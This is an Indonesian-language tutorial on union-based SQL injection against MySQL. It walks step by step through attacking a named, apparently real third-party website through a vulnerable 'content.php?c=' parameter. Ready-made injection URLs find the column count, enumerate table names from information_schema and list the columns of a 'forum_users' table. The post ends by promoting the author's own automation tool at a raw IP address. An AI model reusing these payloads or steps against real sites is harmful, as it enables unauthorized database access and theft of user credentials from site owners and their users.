Mencari tabel dan kolom di target mysql

SQL Injection Mencari tabel dan kolom di target mysql.

Catatan cara ini dapat berhasil jika versi mysql 5 keatas dan information_schema dapat di baca (tidak access denied).

kali ini kita akan ber ekploidtasi pada target
http://www.cpme.be


vuln:
http://www.cpme.be/content.php?c=1[sql]


cari jumlah kolomnya sampai true.

SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,2,3,4/*

ok true kita coba untuk mencari nama tabel.




SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,TABLE_NAME,3,4%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1/*

Dengan sql diatas kita dapat menemukan tabel ke 1 yaitu agenda_international.




kita coba cari tabel ke 2



SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,TABLE_NAME,3,4%20from%20information_schema.tables%20where%20table_schema=database()%20limit%202,1/*

Dengan sql diatas kita dapat menemukan tabel ke 2 yaitu answers

kita dapat mecari tabel ke 3 dst nya dengan menambah angaka di depan limit.



ok setelah dapat tabel mungkin kita akan bertanya bagaimana mencari kolom?

SQL:
http://www.cpme.be/content.php?c=1'%20union%20select%201,COLUMN_NAME,3,4%20from%20information_schema.COLUMNS%20where%20table_name='forum_users'%20and%20table_schema=database()limit%201,1/*

dengan sql diatas kita dapat menemukan kolom 1 pada tabel forum_users yaitu username.

dengan menambah angka di depan limit kita dapat menemukan kolom ke 2 dst.



jika anda merasa lelah itu wajar saja :D lalu adakah cara yang praktis?

sekali lagi saya membuat sebuah tools yang praktis. silahkan anda coba di


http://209.40.202.204/~irvian/ask.php